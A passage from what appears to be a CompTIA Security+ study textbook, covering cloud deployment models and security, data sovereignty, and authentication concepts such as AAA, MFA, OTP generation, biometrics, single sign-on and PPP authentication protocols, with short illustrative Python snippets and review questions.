managed by the organization itself, or a third party. This sort of cloud might be a natural
extension of increasing virtualization in a traditional server room.
Community The service is shared between a number of organizations which have common concerns and
needs, for example organizational mission or specific technical, policy, or security
requirements. It may be hosted by one, by a third party, or as a cooperative venture.
Hybrid The service has some combination of public, private, and community cloud characteristics
under a common hardware or software infrastructure. For example, one provider might host
public cloud services, but also host private clouds for large customers with higher security
needs or other specialized requirements; while both might be the same fundamental service
and even in the same facility there's some separation between the two. For another, the user of
a private cloud might provision cloud bursting features, allowing it to add public cloud
resources during peak usage times.

Just as with the service models, people have since used other deployment models to describe cloud offerings.
Some have even suggested movement toward an Intercloud which will result from the eventual global
connection of interoperable clouds. Since it's a quickly evolving field, only time will tell which definitions
will stick.

Cloud concerns
Cloud computing sometimes gets discussed as some sort of magic that's sure to replace everything. And that's
not entirely untrue: it's been so transformative because its flexibility and economies of scale mean that it can
replace services many organizations used to offer in-house at a fraction of the overall cost, and its online
nature makes it a great fit for widely distributed users. At the same time, skeptics will point out shortcomings
and risks found in cloud technologies.
One problem is the need for bandwidth: with the exception of in-house private clouds, cloud computing
generally requires a lot of WAN traffic, and a service outage will block access to cloud resources entirely.
This often isn't a problem now that fast and inexpensive Internet connections are so common, but
organizations without sufficient speed and reliability might find cloud performance unsatisfactory.
Cloud services can also have a "lock-in effect." A cloud service might be easy to join or expand usage of, but
the same can't always be said about leaving one. Depending on the technology, it might be difficult to
transition from one provider to another, or to return to an in-house solution when needs change.


Cloud security
Cloud services have multiple potential security problems, some of which are unique, and others of which are
shared with traditional network services.

Exam Objective: CompTIA SY0-501 2.6.2.10, 3.7.8, 3.7.9

 Any cloud service is still a network service, and subject to network attacks. This is no different from
traditional network services, but it creates risks that don't exist in the same way on traditional desktop
applications.
 Using an off-premises cloud service requires secure communications to and from the cloud.
 Apart from the need for secured communications with outside providers, using a cloud service for
sensitive information means giving a lot of control of its handling over to another entity. It's possible
that the provider doesn't give the attention to data security that your own organization would, especially
if your data is subject to special regulatory requirements.
 Attacks on public cloud services can affect several or even all customers at a time, so your data might
be compromised by an attack on another customer, or even by an attack that another customer's poor
security practices allowed to happen.
 Different cloud services have varying privacy policies on how they might share customer data and
information, and exactly what jurisdictional privacy laws apply.

One way to help secure cloud access is with a Cloud Access Security Broker (CASB) placed between the
service consumer and the service provider. CASBs are control points that allow an enterprise to centrally
apply its security policies to all cloud access from the enterprise network. For example, you can use one to
manage authentication, encryption, logging, and monitoring services. The CASB can be cloud-based itself, or
located on premises, such as on a proxy server.
On the other hand, cloud services can be a security solution in themselves. While it doesn't map neatly to
NIST's three models, Security as a Service is a growing field of IT security delivered as a cloud service. One
example is cloud-based antimalware or IDS, which has the benefit of using the cloud for distributing
definition files and noticing wider patterns. Other security services involve authentication, logging, or event
management services outsourced to a cloud-based provider.

Legal implications of the cloud


The nature of cloud services and storage means that sensitive data might be shared or moved between
different datacenters or even facilities in different countries. Even if you trust them all for security, this can
have serious legal implications, especially when it comes to regulatory compliance. The simpler matter is that
even within your own country there may be specific regulatory or contractual issues related to storing
sensitive data in a third-party or shared cloud service, so you need to research what rules apply to you. More
complicated issues arise when data might be stored in a different country than your business or your
customers.

Exam Objective: CompTIA SY0-501 5.6.4.4, 5.6.4.5


Data sovereignty, or data residency, is the legal concept that binary data is subject to the laws of whatever
nation it is stored in. That might be one of those issues that seems self-evident at first, but then imagine
it in the context of multi-national corporations building datacenters around the world for cloud services. What
if your customers' personal information ends up in a country with weak privacy laws, or where government
agencies routinely engage in surveillance or searching of private data with little due process? What if the
country where you're storing data has stricter requirements for privacy or auditing than your own? What if
you store data considered important to national security?
Laws and guidelines for data residency are evolving to catch up with emerging technologies, but it's your
responsibility to be aware of them. It may be illegal to store some data in other nations, and data you store on
foreign soil may be subject to your own nation's laws as well as those of where it is physically located. The
reverse is often true: if you store data in a foreign-owned datacenter in your own country, it might be subject
to some laws of the host's home country. Even if laws aren't a barrier for your chosen data storage solution,
it's important to disclose to customers where their personal data might be stored.

Discussion: Cloud services


1. What cloud services have you used? What models did they use?
Answers may vary.
2. You're consulting for a company that's moving into a new facility and trying to decide whether to use a
cloud provider instead of an in-house server room. How would you determine what cloud model they
should evaluate?
Look into what services they would need to provide themselves. If they just need common services like
storage and email, SaaS providers might fill the role, for example, but if they really want full control
they'll want an IaaS provider. It's possible some mix of multiple models might best suit their needs.
3. What special security concerns should that same company address when considering a cloud service?
They should consider the cloud provider's security controls, their privacy policy, relevant regulatory
requirements, and how communications with the provider will themselves be secured.


Assessment: Virtual and cloud systems


1. What model would describe a cloud accounting service? Choose the best response.
 IaaS
 PaaS
 SaaS
 SDN

2. All else being equal, bare metal hypervisors are more efficient than hosted ones. True or false?
 True
 False

3. As long as the host machine has antimalware protection, VMs are protected as well. True or false?
 True
 False

4. What cloud model is likely to provide access to a software environment you can use to develop and host
web-based applications, but not the applications themselves? Choose the best response.
 IaaS
 PaaS
 SaaS
 Any of the above

5. When you use a cloud service, the security controls used by fellow customers could endanger your own
security. True or false?
 True
 False

6. What kind of virtualization relies on a "master image?" Choose the best response.
 Bare metal
 Container
 Non-persistent VDI
 Persistent VDI

7. Your organization has decided to outsource a number of IT services to a cloud provider. They're hosted
outside your enterprise network, but you want to centrally manage all authentication, encryption, activity
logging, and other security policies for connections between local computers and the cloud. What security
solution would address these issues?
 On-premise policies
 Private deployment
 Security as a Service
 Security broker


Summary: Securing network services


You should now know:
 How to secure web applications
 About virtual and cloud systems, along with their specific security concerns



Chapter 8: Authentication
You will learn:
 About authentication factors and principles
 About authentication systems


Module A: Authentication factors


If there's a single central principle to information security, it's access control: only letting the right people
view or alter sensitive data. In turn, if there's one principle that makes access control possible, it's
authentication: verifying that someone who claims to be "the right people" is actually telling the truth.
You will learn:
 About the AAA process
 About authentication factors and credentials
 About single sign-on

The AAA process


As great as encryption is for making sure your communications aren't intercepted in transit, it alone can't
make sure you're talking to the right person in the first place. This can be hard enough in person, and as they
say on the internet no one knows if you're a dog. Then if someone does slip past you, you need to minimize
the potential damage. This is why secure communications setup requires a strict three-step process, which
some protocols call AAA. The same process is valuable for local logon systems, or really any other situation
where access is secured. The process begins when a person, system, or any other entity wants to initiate
communications or access resources. This entity is commonly called either a security principal, or simply a
user.

Exam Objective: CompTIA SY0-501 4.1.1

Authentication Verified identification of a principal, for example via a user name/password or an ID card.
Note: Identification in itself is only the claim of identity made by the
principal, such as the user name alone. It's important too, but it doesn't
prove anything without the accompanying authentication.
Authorization Specifying the exact resources a given authenticated user is allowed to access.
Accounting Tracking the actions of an authenticated user for later review.

For a real world example of the AAA process, imagine you're guarding a security checkpoint to a restricted
wing. Someone comes up and says "I'm Jim from sales" (identification), so you check his ID badge to make
sure it's real (authentication), and now you know for sure it's him. Then you look on the access list to make
sure he's allowed in that wing (authorization), and finally have him sign the entry log (accounting). In this
case, you can also see his identification on the badge itself: that's why identification is sometimes folded into
authentication.
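A toy Python version of that checkpoint shows how the three steps fit together; the account data and permissions are invented for the example, and a real system would store salted password hashes rather than plaintext.

users = {"jim": {"password": "s3cret!", "allowed": {"sales_wing"}}}
audit_log = []

def authenticate(username, password):
    """Verify the claimed identity (identification plus authentication)."""
    account = users.get(username)
    # Real systems store salted password hashes, never plaintext; this is only a sketch.
    return account is not None and account["password"] == password

def authorize(username, resource):
    """Check whether the authenticated user may access this resource."""
    return resource in users[username]["allowed"]

def record(username, resource, granted):
    """Accounting: log the access attempt for later review."""
    audit_log.append((username, resource, "granted" if granted else "denied"))

if authenticate("jim", "s3cret!"):
    granted = authorize("jim", "sales_wing")
    record("jim", "sales_wing", granted)
print(audit_log)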
Of the three, accounting is the least critical for secure systems, but it's still important when responding to
security incidents, or just to track resource uses for performance or other business purposes. Authorization is
vital especially against insider attacks or stolen credentials, but it's conceptually pretty straightforward; as
long as any access is associated with a specific user, that user can be assigned specific permissions. The most
complex part on a network is authenticating the user in the first place. It's also the part usually most visible to
the user. Consequently, while access control systems will use authorization and accounting, authentication
itself takes the most explanation.
It's easy to think of authentication in a strictly client-server fashion, where the server hosting resources asks
for credentials and the client provides them, but mutual authentication, where each party verifies the other, is
also common. Even in a strict client-server model, imagine online banking: to you as a user it's important to
know it really is your bank's website, and that you're not being targeted by a phishing or MitM attack. It's true
of authorization and accounting as well: if a network service can access files or services on your computer,
you might want to restrict or track exactly what it does.

Factor types
The simplest type of authentication is single-factor authentication. It requires a single element that proves
identity. That element of proof belongs to one category, or factor. Traditionally, there are three authentication
factors used in security.

Exam Objective: CompTIA SY0-501 4.1.2

Knowledge Something you know, like a password, PIN, or answer to a challenge question.
Possession Something you possess, like a physical key, ID badge, or smart card. Traditionally, this
includes any form of digital data a human can't be expected to memorize.
Inherence Something you are; that is, a unique physical or behavioral characteristic, like a fingerprint,
voice print, or signature. Inherence elements that are based on personal physical
characteristics are called biometrics.

While these three are central to most authentication discussion, changing technology has added other factors
to the list. Newer sources might include:

Something you do Behavioral recognition, such as analyzing the pattern of someone's keystrokes to
recognize a typing pattern. This category would also encompass signatures, which
traditionally are an inherence factor.
Somewhere you are Recognizing a network user's physical location. For example, a website might only
allow visitors whose IP addresses were initially assigned to a certain country, or a
mobile app might use a device's GPS function to give access based on where the user
is.

Authentication elements aren't always exactly the type of factor you'd think at first glance. Most obviously, a slip
of paper with a password written on it isn't a possession factor, since you're presumably expected to remember
the password and dispose of the paper—the actual authentication system just wants you to type in the
information. For other counterintuitive examples:
 Leaning into a facial recognition scanner is inherence—your face is a part of your identity. An ID card
with your photo is still just possession, though a guard could use the photo itself to help verify that the
card isn't stolen.
 A single-use PIN texted to your phone number every time you log in isn't a knowledge element, even if
it superficially looks like one. It's a possession test, proving that you're the person holding your phone.

On the network especially, authentication is an ongoing process. Session hijacking attacks mean it's important
to verify that each packet is part of the same ongoing conversation. To some extent sufficiently strong
encryption set up during initial authentication handles this, but some systems and protocols will require re-
authentication periodically, or take other measures to make sure that the same user is still there. Usually that's
in a way not visible to the user, but there are exceptions. One example is an ATM requiring users to re-enter
their PIN after each transaction; another is a website that automatically logs users off after ten minutes of
inactivity.


Multifactor authentication
Single-factor authentication is simple and easy, which is why it's so widely used. The problem is that
authentication factors are imperfect. Knowledge factors like passwords are easily shared or even guessed.
Possession factors can be stolen or duplicated. Even inherence factors can be falsified: a fingerprint scanner
can potentially be fooled by using an existing fingerprint smudge and a little glue.
Research has shown that multifactor authentication with two or three factors is much stronger. For example,
an ATM card and its PIN are much more secure together than either is alone: an attacker must both learn the
PIN and acquire the card, which is a lot harder than doing either separately. This is easy to require in
face-to-face situations, but it's harder in computing, where all factors eventually have to be expressed as
digital data and are often shared remotely. The ATM has a specialized reader to recognize your card, but when
you log into your bank's website, your computer probably doesn't. This is why network authentication has
traditionally relied on single-factor authentication using passwords or other knowledge, but increasingly that's
not enough, and designers have had to get more creative.
Two-factor authentication is popular for modern high-security applications. Sometimes inherence factors like
fingerprints or other biometrics are used, but more commonly the second factor is some sort of possession. If
you've ever logged onto an online service and it asked for confirmation through a separate PIN sent to your
telephone number or email address, you've used a possession factor. Some systems might even require
three-factor authentication.

One important point to clarify is that just requiring multiple elements doesn't make an authentication process
multifactor. The elements also need to represent different factor types. For instance, you've probably had a
website ask you both for your password and the answer to a security question, or had to enter both your credit
card number and the "secret code" printed on the back. Even a physical door might need two separate keys,
one for the lock on the knob and one for the deadbolt. All three of these examples have security benefits, since
someone that's stolen one element doesn't necessarily have the other. At the same time, they're not true two-
factor authentication, nor are they as strong: it's easier for someone to falsify identity twice the same way than
to do it two different ways.
Actual examples of two-factor authentication include:
 ATM card and PIN
 Physical token and password
 Password and fingerprint scan
 Physical key and alarm passcode


Discussion: Authentication basics


1. How are all three elements of the AAA process important to security?
Authentication controls who has access, authorization controls what resources an authenticated user can
use, and accounting allows user activities and system changes to be logged.
2. Apart from passwords, what authentication factors are in use at your organization?
ID badges, digital certificates, and signatures are common, among many others.
3. What multifactor authentication systems have you used in the past? Feel free to include those not related
to networks.
Answers may vary, but most people have used a payment card along with a signature or PIN.

Digital credentials
A lot of credential types are probably familiar to you, and don't need much explanation. Keys, ID cards, and
passwords are doubtless part of your daily life. Even if you've never seen a fingerprint or retina scanner
outside of a spy movie, the real world devices follow the same principles. Some others need a little more
explanation.

Exam Objective: CompTIA SY0-501 4.2.12, 4.3.2, 4.3.4.1, 4.3.4.2, 4.3.5.1


The first thing to keep in mind is that when you authenticate to a computer or other electronic device, any
authentication factor needs to be digitized somehow. Even if the device is reading biometric information like a
fingerprint, your fingerprint pattern is going to be turned into a digital map that can be compared against the
one stored on the device. This means that within the system, all authentication factors are data, and data
can be stolen or duplicated. In well-secured systems, credential records stored on devices, and especially those
transmitted over the network, need to be secured themselves. They might be encrypted, or even turned into
cryptographic hashes which can verify the original information but can't recreate it.
For similar reasons, it's easiest to enter credentials into a system when they're digital data in the first place:
what would you do if your apartment complex's website asked you to use your door key to log in? More
realistically, consider a modern ID card with lots of written information, a photograph, a hologram, and other
things that help a security guard spot fakes. Making a card scanner that sees the card exactly the way the guard
does is much harder, so such cards store digital credentials in a different way.
Especially when it comes to possession factors, there are several elements, or implementations, of digital
authentication that you should be familiar with.

Digital certificate A file created and signed using special cryptographic algorithms. The holder has
both a public certificate which can be shared freely, and a secret key which is
never shared. Sample data signed or encrypted with the secret key can be verified
or decrypted with the public certificate, proving that the person or system
presenting the certificate also holds the key. The authentication system can store
certificates for allowed users, or submit a newly presented certificate to a trusted
third party such as a certificate authority to verify its owner's identity. (A code
sketch of this proof-of-possession check follows this table.)
One-time password A single-use PIN or password that is valid for a single session, so can't be stolen
(OTP) and reused. The OTP still has to be known to both the user and the authenticator
somehow, so it's a challenge to accurately create one. An OTP can be generated
independently on both ends by a sequential or time-based algorithm, or it can be
generated by the authenticator and transmitted to the user out-of-band, such as to
an email address or phone number.


Hardware token Broadly speaking, any physical device used to aid authentication by containing
secret information. A hardware token might have an LCD display to generate
OTPs you can type in, or it might be a digital certificate securely stored on a USB
key or scannable card. With the right programming, a smartphone or other mobile
device can be a security token.

Software token A stored file that serves similar purposes to a hardware token. The term is a little
flexible: usually it's applied to applications that allow a smartphone or other
computer to serve as a hardware token, but it's sometimes used to describe
temporary authentication and authorization data stored on and exchanged between
computers in single sign-on environments.
Magnetic stripe card A traditional machine-readable card, such as a bank or transit card, with a
magnetic stripe to store user data. They've been around a very long time, and
while they're useful they're not secure. They don't store very much data, and
they're easy to clone. Magnetic stripe cards can still be used in multi-factor
authentication, but they're not a very strong method on their own.


Smart card A newer type of authentication card with integrated circuits built in. At the least, a smart
card's chip holds basic identifying information like a magnetic stripe would; it can
also hold digital certificates, store temporary data, or even perform cryptographic
processing functions to keep its data secure. Smart cards don't generally contain
batteries, but instead receive power from the reader.

 Contact smart cards make physical contact with the card reader to receive
power and transmit information.
 Contactless smart cards are powered by radio frequency induction from the
reader, and communicate with it using NFC over a 1-3" (2-10cm) distance.
 Proximity cards work like contactless cards, but operate on different
frequencies and hold less information. They operate at distances up to 15"
(50cm) and are usually only used to unlock doors.

Common access card The smart card standard used by active duty US military and Department of
(CAC) Defense personnel both for personal identification and to access secure systems
and locations. As well as human-readable identification, barcodes, and a magnetic
stripe for local security systems, it has a chip with strong cryptographic functions.
In addition to storing one or more digital certificates, the CAC allows secure
verification of the bearer's PIN, providing two-factor authentication. Early CACs
required contact, but modern cards can use contactless authentication.
Personal Identity A smart card standard used by other federal agencies in the US. PIV is similar to the
Verification card (PIV) CAC, but not directly compatible. Different agencies can use somewhat different
card layouts and information, and their digital certificates are issued by different
certification authorities than the DoD's. PIV-Interoperable (PIV-I) cards adhere to
the PIV standard, but are available to non-federal organizations, both public and
private.


Subscriber identity A contact-based smart card that stores the international mobile subscriber identity
module (SIM) (IMSI) number and key associated with a mobile network user. Most cellular
phones worldwide have a SIM slot built in to identify the user on the network,
though some networks store the IMSI in the phone hardware itself. Some SIM
cards store other user data, such as contacts.
SIM cards are available in multiple sizes.
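
To make the digital certificate entry at the top of this table more concrete, here's a minimal sketch of the
underlying proof-of-possession check, written in Python using the third-party cryptography package. It
illustrates the general idea rather than any particular certificate protocol: the verifier sends random sample
data, the holder signs it with the private key, and anyone holding the public half can verify the result. All
names are illustrative.

    import os
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import padding, rsa

    # The key pair; in real life the public half would be wrapped in a signed certificate
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    public_key = private_key.public_key()

    # Verifier's challenge: random sample data that can't be replayed later
    challenge = os.urandom(32)

    # The holder proves possession of the private key by signing the challenge
    signature = private_key.sign(
        challenge,
        padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),
        hashes.SHA256(),
    )

    # The verifier checks the signature with the public key; this raises an exception on failure
    public_key.verify(
        signature,
        challenge,
        padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),
        hashes.SHA256(),
    )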

One-time password generation


One-time passwords are one of the best ways to stop worrying about whether your password has been viewed or
replayed, since once it's been used it's no longer valuable to an attacker. That said, an OTP isn't usually used
as a single authentication factor, but generally as part of a two-factor system. In theory, OTP authentication
could be a knowledge factor: you memorize a whole list of them, set them on the server, and use a new one
every time you log in. In practice, that's not very convenient, so generally an OTP is a possession factor: a
hardware or software token generates the OTP itself.

Exam Objective: CompTIA SY0-501 4.3.4.3


Likewise, a token could just store a list of passwords matching one on the server, but an easier way is to
cryptographically combine a single shared secret that's never transmitted, with a moving factor that changes
with every new OTP. From the outside, that looks like a totally new, totally random password every time. The
trick is making sure the user's token and the authenticator stay synchronized. There are two main standards for
this.


HMAC-based One-Time The moving factor is a counter. Whenever a new OTP is needed, the token
Password (HOTP) generates a cryptographic hash-based message authentication code (HMAC) from
the shared secret and the counter, then increments the counter. The HMAC is
used as the OTP. The token and authenticator just need to stay synchronized on
what the counter currently is.
Time-based One-Time Based on HOTP, and still uses an HMAC generated from a shared secret and a
Password (TOTP) moving factor, but here the moving factor is a timestamp taken when the OTP is
generated. Since TOTP increments automatically rather than just when passwords
are generated, it's generally considered more secure, but for it to work at all the
token and authenticator must keep a fairly accurate time synchronization with
each other (usually about 30 seconds). TOTP is also subject to attacks that can
alter the authenticator's system clock, for example through poorly secured NTP
implementation. An attacker who can control the system clock can easily crack the
rest of the token by brute force, or just render legitimate tokens useless for DoS
purposes.
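
The HOTP and TOTP calculations themselves are short. Here's a minimal Python sketch following the published
RFC 4226/6238 algorithms, assuming 6-digit codes, SHA-1, and 30-second time steps; a production token would
also handle secret provisioning, storage, and counter resynchronization. The example secret is a placeholder.

    import hashlib
    import hmac
    import struct
    import time

    def hotp(secret, counter, digits=6):
        # HMAC over the 8-byte big-endian counter (the "moving factor")
        mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
        # Dynamic truncation: the low nibble of the last byte picks a 4-byte slice
        offset = mac[-1] & 0x0F
        code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % (10 ** digits)).zfill(digits)

    def totp(secret, period=30, digits=6):
        # Same computation, but the counter is the number of time steps since the Unix epoch
        return hotp(secret, int(time.time()) // period, digits)

    print(totp(b"shared-secret-provisioned-at-enrollment"))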

Biometric factors
When it comes to inherence factors, the most common example is biometric factors, or basically any physical
property unique to an individual human's body. Biometrics can be anything from fingerprints to DNA analysis
to scent, and they're usually distinguished from behavioral characteristics which can also be used for
identification, such as signatures or typing rhythm. Some of the most common biometric authentication
sensors include the following:

Exam Objective: CompTIA SY0-501 2.3.14, 4.3.3

Fingerprint scanner Measures the unique patterns of a human fingerprint. Larger palm scanners might
measure the whole hand.
Retinal scanner Measures the unique patterns of blood vessels on the inside of the eye, by shining
low-energy infrared light into the pupil.
Iris scanner Measures the fine patterns of the iris of the eye, usually with near-infrared light so
that patterns show clearly even in dark brown eyes. Sometimes incorrectly called
"retinal scanners", iris scanners are more popular because they're less intrusive and
easier to implement.
Facial recognition Compares an image of the entire face against a known photo. Facial recognition can
work with any device that has an ordinary digital camera, but its reliability depends
on the software used.
Voice recognition Measures the characteristics of a human voice against a recorded example, using a
combination of biometric and behavioral characteristics. Can work in theory on any
device with a microphone.

Many people aren't very clear about what can go wrong with biometrics, given a century of mystery and sci-fi
stories associating fingerprints, retina scans, and other such measurements with foolproof identification. The
first problem is that scanners can indeed be fooled. Fingerprint scanners have been bypassed by means as simple as a
strip of tape that had been pressed to a real fingerprint, and facial or iris scanners by photographs of an
authenticated user.
The second problem is that any biometric scanner is actually using an imprecise digitization of a rather vague set of
physical measurements, so how well it works depends on just how sensitive the scanner is. Imagine a facial
recognition device. It needs to compensate for the imprecision of angle, distance, expression, makeup, and
slight changes in human appearance from day to day. If its tolerances are too tight it will be prone to a high
false rejection rate, impairing legitimate users. If they are too loose, it will be prone to a high false
acceptance rate, easily fooled by similar faces or printed photographs.
For any device, you can map false rejection rates and false acceptance rates on two opposing curves based on
device sensitivity. The place where they meet is called the crossover error rate (CER) or equal error rate
(EER). Whether that's where you want to set the device sensitivity depends on your precise security needs, but
in general you can measure the effectiveness of a biometric authentication method by how low its CER is.
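
A quick way to picture the crossover point is to tabulate FAR and FRR at several sensitivity settings and find
where the two are closest. The numbers in this Python sketch are made up purely for illustration:

    # Hypothetical tuning data: (sensitivity, false acceptance rate, false rejection rate)
    curves = [
        (0.1, 0.200, 0.010),
        (0.3, 0.100, 0.030),
        (0.5, 0.050, 0.050),
        (0.7, 0.020, 0.120),
        (0.9, 0.004, 0.300),
    ]

    # The crossover (equal) error rate is roughly where the two curves meet
    sensitivity, far, frr = min(curves, key=lambda row: abs(row[1] - row[2]))
    print(f"Approximate CER of {far:.1%} at sensitivity {sensitivity}")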

Single sign-on
Traditionally, any network service requiring authentication would handle its own user authentication, but this
has problems as networks become more interrelated, as users have more and more accounts to keep track of,
and as security management becomes more complex and exacting. This has led to the popularity of single
sign-on (SSO) systems, which allow one set of user credentials to give access to a large number of services.
This can work in two primary ways.

Exam Objective: CompTIA SY0-501 4.1.4

 In the strictest sense, SSO allows a user to sign in once to one of a group of mutually-trusting services,
then seamlessly switch between services without being prompted for credentials again. For example,
once you log into Gmail, you can freely switch to other Google services like YouTube or Google+, and
you'll only be prompted for your password again if you try to access something like account or
payment information. Behind the scenes, this all works by the servers communicating through tokens
and certificates to make sure it's still you without interrupting you.


 SSO can also be used to describe systems where multiple independent services share authentication
servers. For example, Facebook Connect allows third-party websites to offer a "Log In with Facebook"
option. You still have to log into each site, but you can just use your Facebook credentials rather than
creating a new account for each site. More accurately, this approach is called same sign-on.

Related to SSO is single sign-off. It's just what it sounds like: signing off one service also signs off of all
related ones.

Transitive trust and federations


Fundamentally, authentication establishes a trust relationship between two parties. SSO requires that trust
relationship to be extended to three or more parties. One way to do this is transitive trust, where if one party
has explicit trust relationships with two other parties, that can form an implied trust relationship between
those two. For example, if Bob trusts (authenticated) Alice, and Charlie trusts Bob, Alice doesn't need to
present authentication to Charlie: Bob can vouch for her. The reverse isn't necessarily true: Alice only trusts
Charlie if both explicit relationships used mutual authentication.

Exam Objective: CompTIA SY0-501 4.1.3, 4.1.5


One common application of SSO is in Windows domains. On the individual domain level, authenticating with
the domain server also authenticates you for all resources that server controls. But larger networks form
hierarchical domain trees and forests, formed by explicit mutual trust relationships between the servers in the
forest. Due to transitive trust, you only have to sign on to your own domain: your domain server's trust in you
is good throughout the forest.

More broadly, federated identity management allows authentication systems to be shared across multiple
systems or networks that share authentication standards even if they're not directly associated with each other.
Members of a federation can share authentication tokens, access shared authentication servers, or otherwise
behave as though they're part of a unified security system. Federations and SSO aren't exactly the same, but a
federation makes single or same sign-on functions much easier to implement.
Remember that authorization is different from authentication: just because a server recognizes who you are
doesn't mean it gives you any special system permissions. Some SSO environments also exchange
authorization information between services, while in others each service independently controls its own
authorization systems.


Discussion: Authentication factors


1. What online services have you used with single sign-on?
Answers may vary.
2. What's the difference between HOTP and TOTP?
HOTP advances the password in a predictable manner using an HMAC whenever a new one is generated,
while TOTP increments automatically using timestamps. TOTP is more secure, but requires time
synchronization on both sides.
3. A coworker set up his computer to use a fingerprint scanner for authentication, and for extra security he
set its options to require the closest possible match. Is this a good idea, and why?
Since biometric scans are hard to absolutely reproduce, very tight tolerances mean he's likely to be
rejected whenever he doesn't scan his finger just right. While this makes it less likely for anyone else to
bypass it, it might make his computer less usable for him too.

Assessment: Authentication factors


1. What AAA element specifies the exact resources a given principal is allowed to access? Choose the best
response.
 Accounting
 Authentication
 Authorization
 Identification

2. You require your users to log on using a user name, password, and rolling 6-digit code sent to a key fob
device. They are then allowed computer, network, and email access. What type of authentication have you
implemented? Choose all that apply.
 Basic single-factor authentication
 Federated identity management
 Multi-factor authentication
 Principle of least privilege
 Single sign-on

3. What are good examples of two-factor authentication? Choose all that apply.
 A credit card and a photo ID
 A credit card and a security code
 A credit card and a signature
 A password followed by a security question
 A password followed by a PIN texted to your phone


4. What authentication standard is used by active duty US military personnel?


 CAC
 PIV
 OTP
 SIM

5. A secure records room installed a new iris scanner, chosen for its low crossover error rate. What does that
mean it has? Choose the best response.
 A high false acceptance rate and a high false rejection rate
 A high false acceptance rate and a low false rejection rate
 A low false acceptance rate and a high false rejection rate
 A low false acceptance rate and a low false rejection rate

6. Federated identity management allows authentication systems to be shared across multiple directly
associated systems or networks. True or false?
 True
 False

7. You've been instructed to implement two-factor authentication for a secure system. Which of the following
would qualify? Choose all that apply.
 Password and OTP
 Smart card and OTP
 Smart card and fingerprint scan
 Iris scan and fingerprint scan
 Password and iris scan


Module B: Authentication protocols


On a local operating system, application, or other self-contained system, authentication is pretty
straightforward: it's handled within the system and you just need to make sure it's configured securely.
Authentication over a network is more difficult. Not only do all systems have to communicate using common
protocols, but for real security the credentials being exchanged must be kept secret, and for sustained
communication sessions authentication needs to be maintained over time.
You will learn:
 About PPP authentication systems
 About network authentication systems and protocols

Network authentication systems


Network authentication is generally simplest when you look at older network services and remote
authentication processes. That's not just because it's often a matter of typing your user name and password
directly into a terminal window, but also because the credentials are exchanged unencrypted like any other
data. This is insecure, and extremely vulnerable to eavesdropping, replay attacks, and session hijacking.
Newer replacements use cryptographic processes to make sure communications are set up securely: secrets
are never exchanged over unencrypted channels, and ideally even encrypted credentials are never transmitted
the same way twice, to prevent replay attacks.
Authentication, and more broadly AAA, isn't just for specific services; it's often used more centrally to secure
a network's resources, or restrict access to it in the first place. Often this is done using an authentication
server handling security functions for the rest of the network. There are a few different scenarios when a
network will use centralized authentication. All of them have some of the same security concerns as remote
login protocols, and have seen much of the same evolution over time, but they also have some unique
properties and needs.
 To authenticate remote connections into the network
 To allow multiple nodes to communicate securely across an unsecured network
 To authenticate local users joining a LAN or WLAN

Point-to-Point Protocol
A leased line or switched circuit on the WAN, once established, is a pretty simple "pipe" for data without the
complications of a packet-switched network, but you still need some sort of data link layer protocol to do the
rest of the work of transporting higher level traffic. A common option is Point-to-Point Protocol (PPP), which
is used on everything from dialup connections to SONET leased lines, and can carry IP, IPX, and other high-
level traffic. PPP is also commonly used to carry data through the virtual circuit of a VPN, where it operates
on top of a tunneling protocol like PPTP or L2TP.


PPP itself consists of multiple layers and components. At the heart of it is the PPP encapsulation component,
which transmits data and handles error correction. Above it is Link Control Protocol (LCP), which negotiates
and terminates connections. It allows authentication, data compression, MTU negotiation, and detection of
loops and other errors. It also allows multiple links to be aggregated into a single logical connection, a feature
known as multilink PPP.
Also above is another network control protocol (NCP) for each L3 protocol PPP is expected to carry, for
example Internet Protocol Control Protocol (IPCP) for IP traffic. Multiple NCPs can run on one link.
Over serial connections PPP includes its own framing protocols; for example, on optical backbones it uses
Packet over SONET/SDH (POS). It can also be run over other L2 protocols like Ethernet or ATM. This allows
the authentication, compression, and connection-oriented nature of PPP to operate over a packet-switched
network. These standards, such as PPP over Ethernet (PPPoE) and PPP over ATM (PPPoA) are popular
especially for use with DSL modems and other residential gateway devices.


PPP authentication
PPP connections present an obvious need for network authentication, especially when they're not over a
permanent circuit. There are a number of standards commonly supported.

Exam Objective: CompTIA SY0-501 4.2.4, 4.2.5, 4.2.6, 6.3.2.1, 6.3.2.2, 6.3.2.3, 6.3.2.4, 6.3.2.5

PAP Password Authentication Protocol is the oldest and most widely supported standard. It uses a
two-way handshake: the client presents a username and password, then the server accepts or
rejects it. PAP gives only one-way authentication, and the exchange happens in plaintext; for this
reason, it should only be used as a last resort.
CHAP Challenge-Handshake Authentication Protocol uses a three-way handshake, with security
provided by a shared secret: both ends know the secret in plaintext, but it's never transmitted
over the network. (A minimal sketch of the response hash follows this list.)

1. The server sends a unique challenge message to the client.


2. The client responds with a hash created from the challenge and secret.
3. The server verifies the response against its own hash, and confirms or rejects the
authentication.
4. Periodically during the session, the server repeats the challenge process to prevent session
hijacking.
CHAP is more secure than PAP, but still has some vulnerabilities, and doesn't provide mutual
authentication or other advanced features.

MS-CHAP Microsoft's version of CHAP has some enhancements over the basic version: the password
doesn't need to be stored in plaintext, and it can perform mutual authentication. There are two
versions: MS-CHAPv1 and v2. Only v2 is supported by modern Windows versions, but even it
has weaknesses that make it highly susceptible to brute force attacks.
EAP Extensible Authentication Protocol is a PPP extension that can also be used for wireless
authentication. It's not an authentication method in itself, but rather a message format and set of
common functions that can be used to support a wide variety of specific authentication methods.
Some methods are password-based, and are more secure or flexible alternatives to CHAP, while
others use different security mechanisms.
 EAP-TLS and EAP-TTLS typically use X.509 certificates in the authentication process.
 EAP-SIM, used by GSM cellular networks, authenticates using device SIM cards.
 WPA Enterprise uses EAP along with the 802.1X standard for authentication.
 LEAP, or Lightweight EAP is a proprietary Cisco version of EAP, based on MS-CHAP. It
was widely used in early Wi-Fi devices but has been largely replaced with more secure
standards.
 EAP-FAST or EAP Flexible Authentication via Secure Tunneling is a newer Cisco
